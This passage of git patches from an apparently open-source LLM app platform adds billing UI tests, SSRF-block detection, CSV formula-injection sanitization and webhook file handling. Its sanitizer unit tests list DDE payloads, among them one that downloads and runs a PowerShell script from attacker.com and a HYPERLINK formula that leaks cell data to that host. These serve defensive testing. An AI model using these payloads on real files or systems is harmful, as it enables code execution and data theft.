b/web/app/components/billing/annotation-full/modal.spec.tsx @@ -0,0 +1,119 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import AnnotationFullModal from './modal' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +let mockUsageProps: { className?: string } | null = null +jest.mock('./usage', () => ({ + __esModule: true, + default: (props: { className?: string }) => { + mockUsageProps = props + return ( +
+ usage +
+ ) + }, +})) + +let mockUpgradeBtnProps: { loc?: string } | null = null +jest.mock('../upgrade-btn', () => ({ + __esModule: true, + default: (props: { loc?: string }) => { + mockUpgradeBtnProps = props + return ( + + ) + }, +})) + +type ModalSnapshot = { + isShow: boolean + closable?: boolean + className?: string +} +let mockModalProps: ModalSnapshot | null = null +jest.mock('../../base/modal', () => ({ + __esModule: true, + default: ({ isShow, children, onClose, closable, className }: { isShow: boolean; children: React.ReactNode; onClose: () => void; closable?: boolean; className?: string }) => { + mockModalProps = { + isShow, + closable, + className, + } + if (!isShow) + return null + return ( +
+ {closable && ( + + )} + {children} +
+ ) + }, +})) + +describe('AnnotationFullModal', () => { + beforeEach(() => { + jest.clearAllMocks() + mockUsageProps = null + mockUpgradeBtnProps = null + mockModalProps = null + }) + + // Rendering marketing copy inside modal + describe('Rendering', () => { + it('should display main info when visible', () => { + // Act + render() + + // Assert + expect(screen.getByText('billing.annotatedResponse.fullTipLine1')).toBeInTheDocument() + expect(screen.getByText('billing.annotatedResponse.fullTipLine2')).toBeInTheDocument() + expect(screen.getByTestId('usage-component')).toHaveAttribute('data-classname', 'mt-4') + expect(screen.getByTestId('upgrade-btn')).toHaveTextContent('annotation-create') + expect(mockUpgradeBtnProps?.loc).toBe('annotation-create') + expect(mockModalProps).toEqual(expect.objectContaining({ + isShow: true, + closable: true, + className: '!p-0', + })) + }) + }) + + // Controlling modal visibility + describe('Visibility', () => { + it('should not render content when hidden', () => { + // Act + const { container } = render() + + // Assert + expect(container).toBeEmptyDOMElement() + expect(mockModalProps).toEqual(expect.objectContaining({ isShow: false })) + }) + }) + + // Handling close interactions + describe('Close handling', () => { + it('should trigger onHide when close control is clicked', () => { + // Arrange + const onHide = jest.fn() + + // Act + render() + fireEvent.click(screen.getByTestId('mock-modal-close')) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx new file mode 100644 index 0000000000..25ee1fb8c8 --- /dev/null +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx @@ -0,0 +1,52 @@ +import { render, screen } from '@testing-library/react' +import Item from './index' + +describe('Item', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering the plan item row + describe('Rendering', () => { + it('should render the provided label when tooltip is absent', () => { + // Arrange + const label = 'Monthly credits' + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(label)).toBeInTheDocument() + expect(container.querySelector('.group')).toBeNull() + }) + }) + + // Toggling the optional tooltip indicator + describe('Tooltip behavior', () => { + it('should render tooltip content when tooltip text is provided', () => { + // Arrange + const label = 'Workspace seats' + const tooltip = 'Seats define how many teammates can join the workspace.' + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(label)).toBeInTheDocument() + expect(screen.getByText(tooltip)).toBeInTheDocument() + expect(container.querySelector('.group')).not.toBeNull() + }) + + it('should treat an empty tooltip string as absent', () => { + // Arrange + const label = 'Vector storage' + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(label)).toBeInTheDocument() + expect(container.querySelector('.group')).toBeNull() + }) + }) +}) diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx new file mode 100644 index 0000000000..b1a6750fd7 --- /dev/null +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx @@ -0,0 +1,46 @@ +import { render, screen } from '@testing-library/react' +import Tooltip from './tooltip' + +describe('Tooltip', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering the info tooltip container + describe('Rendering', () => { + it('should render the content panel when provide with text', () => { + // Arrange + const content = 'Usage resets on the first day of every month.' + + // Act + render() + + // Assert + expect(() => screen.getByText(content)).not.toThrow() + }) + }) + + describe('Icon rendering', () => { + it('should render the icon when provided with content', () => { + // Arrange + const content = 'Tooltips explain each plan detail.' + + // Act + render() + + // Assert + expect(screen.getByTestId('tooltip-icon')).toBeInTheDocument() + }) + }) + + // Handling empty strings while keeping structure consistent + describe('Edge cases', () => { + it('should render without crashing when passed empty content', () => { + // Arrange + const content = '' + + // Act and Assert + expect(() => render()).not.toThrow() + }) + }) +}) diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx index 84e0282993..cf6517b292 100644 --- a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx @@ -8,13 +8,15 @@ type TooltipProps = { const Tooltip = ({ content, }: TooltipProps) => { + if (!content) + return null return (
{content}
- +
) From 2bf44057e95e4660bf5260ea58143546272db919 Mon Sep 17 00:00:00 2001 From: zyssyz123 <916125788@qq.com> Date: Mon, 15 Dec 2025 16:28:25 +0800 Subject: [PATCH 28/68] fix: ssrf, add internal ip filter when parse tool schema (#29548) Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> Co-authored-by: Yeuoly <45712896+Yeuoly@users.noreply.github.com> --- api/core/helper/ssrf_proxy.py | 13 +++++++++++++ api/core/tools/errors.py | 4 ++++ api/core/tools/utils/parser.py | 3 +-- 3 files changed, 18 insertions(+), 2 deletions(-) diff --git a/api/core/helper/ssrf_proxy.py b/api/core/helper/ssrf_proxy.py index 0de026f3c7..6c98aea1be 100644 --- a/api/core/helper/ssrf_proxy.py +++ b/api/core/helper/ssrf_proxy.py @@ -9,6 +9,7 @@ import httpx from configs import dify_config from core.helper.http_client_pooling import get_pooled_http_client +from core.tools.errors import ToolSSRFError logger = logging.getLogger(__name__) @@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs): while retries <= max_retries: try: response = client.request(method=method, url=url, **kwargs) + # Check for SSRF protection by Squid proxy + if response.status_code in (401, 403): + # Check if this is a Squid SSRF rejection + server_header = response.headers.get("server", "").lower() + via_header = response.headers.get("via", "").lower() + + # Squid typically identifies itself in Server or Via headers + if "squid" in server_header or "squid" in via_header: + raise ToolSSRFError( + f"Access to '{url}' was blocked by SSRF protection. " + f"The URL may point to a private or local network address. " + ) if response.status_code not in STATUS_FORCELIST: return response diff --git a/api/core/tools/errors.py b/api/core/tools/errors.py index b0c2232857..e4afe24426 100644 --- a/api/core/tools/errors.py +++ b/api/core/tools/errors.py @@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError): pass +class ToolSSRFError(ValueError): + pass + + class ToolCredentialPolicyViolationError(ValueError): pass diff --git a/api/core/tools/utils/parser.py b/api/core/tools/utils/parser.py index 6eabde3991..3486182192 100644 --- a/api/core/tools/utils/parser.py +++ b/api/core/tools/utils/parser.py @@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser: except ToolApiSchemaError as e: openapi_error = e - # openai parse error, fallback to swagger + # openapi parse error, fallback to swagger try: converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi( loaded_content, extra_info=extra_info, warning=warning @@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser: ), schema_type except ToolApiSchemaError as e: swagger_error = e - # swagger parse error, fallback to openai plugin try: openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle( From bd7b1fc6fbb648f6bf6c6006230262c77029c896 Mon Sep 17 00:00:00 2001 From: zyssyz123 <916125788@qq.com> Date: Mon, 15 Dec 2025 17:14:05 +0800 Subject: [PATCH 29/68] fix: csv injection in annotations export (#29462) Co-authored-by: hj24 Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> --- api/controllers/console/app/annotation.py | 14 +- api/core/helper/csv_sanitizer.py | 89 +++++++++++ api/services/annotation_service.py | 17 ++ .../console/app/test_annotation_security.py | 7 +- .../core/helper/test_csv_sanitizer.py | 151 ++++++++++++++++++ 5 files changed, 271 insertions(+), 7 deletions(-) create mode 100644 api/core/helper/csv_sanitizer.py create mode 100644 api/tests/unit_tests/core/helper/test_csv_sanitizer.py diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 0aed36a7fd..6a4c1528b0 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import abort, request +from flask import abort, make_response, request from flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -259,7 +259,7 @@ class AnnotationApi(Resource): @console_ns.route("/apps//annotations/export") class AnnotationExportApi(Resource): @console_ns.doc("export_annotations") - @console_ns.doc(description="Export all annotations for an app") + @console_ns.doc(description="Export all annotations for an app with CSV injection protection") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response( 200, @@ -274,8 +274,14 @@ class AnnotationExportApi(Resource): def get(self, app_id): app_id = str(app_id) annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id) - response = {"data": marshal(annotation_list, annotation_fields)} - return response, 200 + response_data = {"data": marshal(annotation_list, annotation_fields)} + + # Create response with secure headers for CSV export + response = make_response(response_data, 200) + response.headers["Content-Type"] = "application/json; charset=utf-8" + response.headers["X-Content-Type-Options"] = "nosniff" + + return response @console_ns.route("/apps//annotations/") diff --git a/api/core/helper/csv_sanitizer.py b/api/core/helper/csv_sanitizer.py new file mode 100644 index 0000000000..0023de5a35 --- /dev/null +++ b/api/core/helper/csv_sanitizer.py @@ -0,0 +1,89 @@ +"""CSV sanitization utilities to prevent formula injection attacks.""" + +from typing import Any + + +class CSVSanitizer: + """ + Sanitizer for CSV export to prevent formula injection attacks. + + This class provides methods to sanitize data before CSV export by escaping + characters that could be interpreted as formulas by spreadsheet applications + (Excel, LibreOffice, Google Sheets). + + Formula injection occurs when user-controlled data starting with special + characters (=, +, -, @, tab, carriage return) is exported to CSV and opened + in a spreadsheet application, potentially executing malicious commands. + """ + + # Characters that can start a formula in Excel/LibreOffice/Google Sheets + FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"}) + + @classmethod + def sanitize_value(cls, value: Any) -> str: + """ + Sanitize a value for safe CSV export. + + Prefixes formula-initiating characters with a single quote to prevent + Excel/LibreOffice/Google Sheets from treating them as formulas. + + Args: + value: The value to sanitize (will be converted to string) + + Returns: + Sanitized string safe for CSV export + + Examples: + >>> CSVSanitizer.sanitize_value("=1+1") + "'=1+1" + >>> CSVSanitizer.sanitize_value("Hello World") + "Hello World" + >>> CSVSanitizer.sanitize_value(None) + "" + """ + if value is None: + return "" + + # Convert to string + str_value = str(value) + + # If empty, return as is + if not str_value: + return "" + + # Check if first character is a formula initiator + if str_value[0] in cls.FORMULA_CHARS: + # Prefix with single quote to escape + return f"'{str_value}" + + return str_value + + @classmethod + def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]: + """ + Sanitize specified fields in a dictionary. + + Args: + data: Dictionary containing data to sanitize + fields_to_sanitize: List of field names to sanitize. + If None, sanitizes all string fields. + + Returns: + Dictionary with sanitized values (creates a shallow copy) + + Examples: + >>> data = {"question": "=1+1", "answer": "+calc", "id": "123"} + >>> CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + {"question": "'=1+1", "answer": "'+calc", "id": "123"} + """ + sanitized = data.copy() + + if fields_to_sanitize is None: + # Sanitize all string fields + fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)] + + for field in fields_to_sanitize: + if field in sanitized: + sanitized[field] = cls.sanitize_value(sanitized[field]) + + return sanitized diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py index f750186ab0..d03cbddceb 100644 --- a/api/services/annotation_service.py +++ b/api/services/annotation_service.py @@ -8,6 +8,7 @@ from sqlalchemy import or_, select from werkzeug.datastructures import FileStorage from werkzeug.exceptions import NotFound +from core.helper.csv_sanitizer import CSVSanitizer from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -158,6 +159,12 @@ class AppAnnotationService: @classmethod def export_annotation_list_by_app_id(cls, app_id: str): + """ + Export all annotations for an app with CSV injection protection. + + Sanitizes question and content fields to prevent formula injection attacks + when exported to CSV format. + """ # get app info _, current_tenant_id = current_account_with_tenant() app = ( @@ -174,6 +181,16 @@ class AppAnnotationService: .order_by(MessageAnnotation.created_at.desc()) .all() ) + + # Sanitize CSV-injectable fields to prevent formula injection + for annotation in annotations: + # Sanitize question field if present + if annotation.question: + annotation.question = CSVSanitizer.sanitize_value(annotation.question) + # Sanitize content field (answer) + if annotation.content: + annotation.content = CSVSanitizer.sanitize_value(annotation.content) + return annotations @classmethod diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py index 36da3c264e..11d12792c9 100644 --- a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -250,8 +250,8 @@ class TestAnnotationImportServiceValidation: """Test that invalid CSV format is handled gracefully.""" from services.annotation_service import AppAnnotationService - # Create invalid CSV content - csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + # Create CSV with only one column (should require at least 2 columns for question and answer) + csv_content = "single_column_header\nonly_one_value" file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") @@ -262,8 +262,9 @@ class TestAnnotationImportServiceValidation: result = AppAnnotationService.batch_import_app_annotations("app_id", file) - # Should return error message + # Should return error message about invalid format (less than 2 columns) assert "error_msg" in result + assert "at least 2 columns" in result["error_msg"].lower() def test_valid_import_succeeds(self, mock_app, mock_db_session): """Test that valid import request succeeds.""" diff --git a/api/tests/unit_tests/core/helper/test_csv_sanitizer.py b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py new file mode 100644 index 0000000000..443c2824d5 --- /dev/null +++ b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py @@ -0,0 +1,151 @@ +"""Unit tests for CSV sanitizer.""" + +from core.helper.csv_sanitizer import CSVSanitizer + + +class TestCSVSanitizer: + """Test cases for CSV sanitization to prevent formula injection attacks.""" + + def test_sanitize_formula_equals(self): + """Test sanitizing values starting with = (most common formula injection).""" + assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0" + assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)" + assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1" + assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)" + + def test_sanitize_formula_plus(self): + """Test sanitizing values starting with + (plus formula injection).""" + assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("+123") == "'+123" + assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0" + + def test_sanitize_formula_minus(self): + """Test sanitizing values starting with - (minus formula injection).""" + assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("-456") == "'-456" + assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad" + + def test_sanitize_formula_at(self): + """Test sanitizing values starting with @ (at-sign formula injection).""" + assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc" + assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)" + + def test_sanitize_formula_tab(self): + """Test sanitizing values starting with tab character.""" + assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1" + assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc" + + def test_sanitize_formula_carriage_return(self): + """Test sanitizing values starting with carriage return.""" + assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1" + assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd" + + def test_sanitize_safe_values(self): + """Test that safe values are not modified.""" + assert CSVSanitizer.sanitize_value("Hello World") == "Hello World" + assert CSVSanitizer.sanitize_value("123") == "123" + assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com" + assert CSVSanitizer.sanitize_value("Normal text") == "Normal text" + assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?" + + def test_sanitize_safe_values_with_special_chars_in_middle(self): + """Test that special characters in the middle are not escaped.""" + assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C" + assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20" + assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com" + + def test_sanitize_empty_values(self): + """Test handling of empty values.""" + assert CSVSanitizer.sanitize_value("") == "" + assert CSVSanitizer.sanitize_value(None) == "" + + def test_sanitize_numeric_types(self): + """Test handling of numeric types.""" + assert CSVSanitizer.sanitize_value(123) == "123" + assert CSVSanitizer.sanitize_value(456.789) == "456.789" + assert CSVSanitizer.sanitize_value(0) == "0" + # Negative numbers should be escaped (start with -) + assert CSVSanitizer.sanitize_value(-123) == "'-123" + + def test_sanitize_boolean_types(self): + """Test handling of boolean types.""" + assert CSVSanitizer.sanitize_value(True) == "True" + assert CSVSanitizer.sanitize_value(False) == "False" + + def test_sanitize_dict_with_specific_fields(self): + """Test sanitizing specific fields in a dictionary.""" + data = { + "question": "=1+1", + "answer": "+cmd|'/c calc", + "safe_field": "Normal text", + "id": "12345", + } + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+cmd|'/c calc" + assert sanitized["safe_field"] == "Normal text" + assert sanitized["id"] == "12345" + + def test_sanitize_dict_all_string_fields(self): + """Test sanitizing all string fields when no field list provided.""" + data = { + "question": "=1+1", + "answer": "+calc", + "id": 123, # Not a string, should be ignored + } + sanitized = CSVSanitizer.sanitize_dict(data, None) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+calc" + assert sanitized["id"] == 123 # Unchanged + + def test_sanitize_dict_with_missing_fields(self): + """Test that missing fields in dict don't cause errors.""" + data = {"question": "=1+1"} + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"]) + + assert sanitized["question"] == "'=1+1" + assert "nonexistent_field" not in sanitized + + def test_sanitize_dict_creates_copy(self): + """Test that sanitize_dict creates a copy and doesn't modify original.""" + original = {"question": "=1+1", "answer": "Normal"} + sanitized = CSVSanitizer.sanitize_dict(original, ["question"]) + + assert original["question"] == "=1+1" # Original unchanged + assert sanitized["question"] == "'=1+1" # Copy sanitized + + def test_real_world_csv_injection_payloads(self): + """Test against real-world CSV injection attack payloads.""" + # Common DDE (Dynamic Data Exchange) attack payloads + payloads = [ + "=cmd|'/c calc'!A0", + "=cmd|'/c notepad'!A0", + "+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'", + "-2+3+cmd|'/c calc'", + "@SUM(1+1)*cmd|'/c calc'", + "=1+1+cmd|'/c calc'", + '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")', + ] + + for payload in payloads: + result = CSVSanitizer.sanitize_value(payload) + # All should be prefixed with single quote + assert result.startswith("'"), f"Payload not sanitized: {payload}" + assert result == f"'{payload}", f"Unexpected sanitization for: {payload}" + + def test_multiline_strings(self): + """Test handling of multiline strings.""" + multiline = "Line 1\nLine 2\nLine 3" + assert CSVSanitizer.sanitize_value(multiline) == multiline + + multiline_with_formula = "=SUM(A1)\nLine 2" + assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}" + + def test_whitespace_only_strings(self): + """Test handling of whitespace-only strings.""" + assert CSVSanitizer.sanitize_value(" ") == " " + assert CSVSanitizer.sanitize_value("\n\n") == "\n\n" + # Tab at start should be escaped + assert CSVSanitizer.sanitize_value("\t ") == "'\t " From a8f3061b3c9350e1570979794e5cb521dd60a2da Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 18:02:34 +0800 Subject: [PATCH 30/68] fix: all upload files are disabled if upload file feature disabled (#29681) --- web/app/components/base/chat/chat/chat-input-area/index.tsx | 2 +- web/app/components/base/file-uploader/hooks.ts | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/web/app/components/base/chat/chat/chat-input-area/index.tsx b/web/app/components/base/chat/chat/chat-input-area/index.tsx index 7d08b84b8e..5004bb2a92 100644 --- a/web/app/components/base/chat/chat/chat-input-area/index.tsx +++ b/web/app/components/base/chat/chat/chat-input-area/index.tsx @@ -79,7 +79,7 @@ const ChatInputArea = ({ handleDropFile, handleClipboardPasteFile, isDragActive, - } = useFile(visionConfig!) + } = useFile(visionConfig!, false) const { checkInputsForm } = useCheckInputsForms() const historyRef = useRef(['']) const [currentIndex, setCurrentIndex] = useState(-1) diff --git a/web/app/components/base/file-uploader/hooks.ts b/web/app/components/base/file-uploader/hooks.ts index baef5ff7d8..2e72574cfb 100644 --- a/web/app/components/base/file-uploader/hooks.ts +++ b/web/app/components/base/file-uploader/hooks.ts @@ -47,7 +47,7 @@ export const useFileSizeLimit = (fileUploadConfig?: FileUploadConfigResponse) => } } -export const useFile = (fileConfig: FileUpload) => { +export const useFile = (fileConfig: FileUpload, noNeedToCheckEnable = true) => { const { t } = useTranslation() const { notify } = useToastContext() const fileStore = useFileStore() @@ -247,7 +247,7 @@ export const useFile = (fileConfig: FileUpload) => { const handleLocalFileUpload = useCallback((file: File) => { // Check file upload enabled - if (!fileConfig.enabled) { + if (!noNeedToCheckEnable && !fileConfig.enabled) { notify({ type: 'error', message: t('common.fileUploader.uploadDisabled') }) return } @@ -303,7 +303,7 @@ export const useFile = (fileConfig: FileUpload) => { false, ) reader.readAsDataURL(file) - }, [checkSizeLimit, notify, t, handleAddFile, handleUpdateFile, params.token, fileConfig?.allowed_file_types, fileConfig?.allowed_file_extensions, fileConfig?.enabled]) + }, [noNeedToCheckEnable, checkSizeLimit, notify, t, handleAddFile, handleUpdateFile, params.token, fileConfig?.allowed_file_types, fileConfig?.allowed_file_extensions, fileConfig?.enabled]) const handleClipboardPasteFile = useCallback((e: ClipboardEvent) => { const file = e.clipboardData?.files[0] From 09982a1c95e1ce65981cfeef2c6da852b74678a2 Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Mon, 15 Dec 2025 19:55:59 +0800 Subject: [PATCH 31/68] fix: webhook node output file as file variable (#29621) --- .../workflow/nodes/trigger_webhook/node.py | 59 ++- api/factories/file_factory.py | 17 +- .../services/test_webhook_service.py | 6 +- .../console/app/test_annotation_security.py | 14 +- .../webhook/test_webhook_file_conversion.py | 452 ++++++++++++++++++ .../nodes/webhook/test_webhook_node.py | 75 ++- .../services/test_webhook_service.py | 6 +- 7 files changed, 585 insertions(+), 44 deletions(-) create mode 100644 api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py diff --git a/api/core/workflow/nodes/trigger_webhook/node.py b/api/core/workflow/nodes/trigger_webhook/node.py index 3631c8653d..ec8c4b8ee3 100644 --- a/api/core/workflow/nodes/trigger_webhook/node.py +++ b/api/core/workflow/nodes/trigger_webhook/node.py @@ -1,14 +1,22 @@ +import logging from collections.abc import Mapping from typing import Any +from core.file import FileTransferMethod +from core.variables.types import SegmentType +from core.variables.variables import FileVariable from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.enums import NodeExecutionType, NodeType from core.workflow.node_events import NodeRunResult from core.workflow.nodes.base.node import Node +from factories import file_factory +from factories.variable_factory import build_segment_with_type from .entities import ContentType, WebhookData +logger = logging.getLogger(__name__) + class TriggerWebhookNode(Node[WebhookData]): node_type = NodeType.TRIGGER_WEBHOOK @@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]): outputs=outputs, ) + def generate_file_var(self, param_name: str, file: dict): + related_id = file.get("related_id") + transfer_method_value = file.get("transfer_method") + if transfer_method_value: + transfer_method = FileTransferMethod.value_of(transfer_method_value) + match transfer_method: + case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL: + file["upload_file_id"] = related_id + case FileTransferMethod.TOOL_FILE: + file["tool_file_id"] = related_id + case FileTransferMethod.DATASOURCE_FILE: + file["datasource_file_id"] = related_id + + try: + file_obj = file_factory.build_from_mapping( + mapping=file, + tenant_id=self.tenant_id, + ) + file_segment = build_segment_with_type(SegmentType.FILE, file_obj) + return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name]) + except ValueError: + logger.error( + "Failed to build FileVariable for webhook file parameter %s", + param_name, + exc_info=True, + ) + return None + def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]: """Extract outputs based on node configuration from webhook inputs.""" outputs = {} @@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]): outputs[param_name] = str(webhook_data.get("body", {}).get("raw", "")) continue elif self.node_data.content_type == ContentType.BINARY: - outputs[param_name] = webhook_data.get("body", {}).get("raw", b"") + raw_data: dict = webhook_data.get("body", {}).get("raw", {}) + file_var = self.generate_file_var(param_name, raw_data) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = raw_data continue if param_type == "file": # Get File object (already processed by webhook controller) - file_obj = webhook_data.get("files", {}).get(param_name) - outputs[param_name] = file_obj + files = webhook_data.get("files", {}) + if files and isinstance(files, dict): + file = files.get(param_name) + if file and isinstance(file, dict): + file_var = self.generate_file_var(param_name, file) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = files + else: + outputs[param_name] = files + else: + outputs[param_name] = files else: # Get regular body parameter outputs[param_name] = webhook_data.get("body", {}).get(param_name) # Include raw webhook data for debugging/advanced use outputs["_webhook_raw"] = webhook_data - return outputs diff --git a/api/factories/file_factory.py b/api/factories/file_factory.py index 737a79f2b0..bd71f18af2 100644 --- a/api/factories/file_factory.py +++ b/api/factories/file_factory.py @@ -1,3 +1,4 @@ +import logging import mimetypes import os import re @@ -17,6 +18,8 @@ from core.helper import ssrf_proxy from extensions.ext_database import db from models import MessageFile, ToolFile, UploadFile +logger = logging.getLogger(__name__) + def build_from_message_files( *, @@ -356,15 +359,20 @@ def _build_from_tool_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + # Backward/interop compatibility: allow tool_file_id to come from related_id or URL + tool_file_id = mapping.get("tool_file_id") + + if not tool_file_id: + raise ValueError(f"ToolFile {tool_file_id} not found") tool_file = db.session.scalar( select(ToolFile).where( - ToolFile.id == mapping.get("tool_file_id"), + ToolFile.id == tool_file_id, ToolFile.tenant_id == tenant_id, ) ) if tool_file is None: - raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found") + raise ValueError(f"ToolFile {tool_file_id} not found") extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin" @@ -402,10 +410,13 @@ def _build_from_datasource_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + datasource_file_id = mapping.get("datasource_file_id") + if not datasource_file_id: + raise ValueError(f"DatasourceFile {datasource_file_id} not found") datasource_file = ( db.session.query(UploadFile) .where( - UploadFile.id == mapping.get("datasource_file_id"), + UploadFile.id == datasource_file_id, UploadFile.tenant_id == tenant_id, ) .first() diff --git a/api/tests/test_containers_integration_tests/services/test_webhook_service.py b/api/tests/test_containers_integration_tests/services/test_webhook_service.py index 8328db950c..e3431fd382 100644 --- a/api/tests/test_containers_integration_tests/services/test_webhook_service.py +++ b/api/tests/test_containers_integration_tests/services/test_webhook_service.py @@ -233,7 +233,7 @@ class TestWebhookService: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" @@ -242,7 +242,7 @@ class TestWebhookService: assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert "upload" in webhook_data["files"] + assert "file" in webhook_data["files"] # Verify file processing was called mock_external_dependencies["tool_file_manager"].assert_called_once() @@ -414,7 +414,7 @@ class TestWebhookService: "data": { "method": "post", "content_type": "multipart/form-data", - "body": [{"name": "upload", "type": "file", "required": True}], + "body": [{"name": "file", "type": "file", "required": True}], } } diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py index 11d12792c9..06a7b98baf 100644 --- a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -9,6 +9,7 @@ import io from unittest.mock import MagicMock, patch import pytest +from pandas.errors import ParserError from werkzeug.datastructures import FileStorage from configs import dify_config @@ -250,21 +251,22 @@ class TestAnnotationImportServiceValidation: """Test that invalid CSV format is handled gracefully.""" from services.annotation_service import AppAnnotationService - # Create CSV with only one column (should require at least 2 columns for question and answer) - csv_content = "single_column_header\nonly_one_value" - + # Any content is fine once we force ParserError + csv_content = 